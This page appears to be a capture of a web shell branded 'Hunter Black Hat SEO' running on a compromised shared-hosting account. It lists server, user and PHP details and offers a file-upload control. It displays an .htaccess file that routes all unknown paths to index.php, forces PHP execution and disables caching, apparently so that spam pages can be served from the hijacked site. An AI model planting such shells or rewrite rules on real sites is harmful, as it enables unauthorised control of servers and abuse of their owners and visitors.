Hunter Black Hat SEO
Server:LiteSpeed
System:Linux altar25.supremepanel25.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
User:flexnetw (3555)
PHP:7.2.34
Disabled:NONE
Upload Files
File: /home/flexnetw/public_html/old/contact-us/.htaccess
# Matikan semua aturan rewrite WordPress / LiteSpeed di folder ini

<IfModule mod_rewrite.c>
    RewriteEngine On

# Jika file atau folder tidak ada → arahkan ke index.php

    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^.*$ index.php [L]
</IfModule>


# Pastikan file PHP bisa dieksekusi

<IfModule mime_module>
    AddHandler application/x-httpd-php .php
</IfModule>


# Nonaktifkan cache LiteSpeed khusus folder ini

<IfModule LiteSpeed>
    RewriteEngine On
    RewriteRule .* - [E=Cache-Control:no-cache]
</IfModule>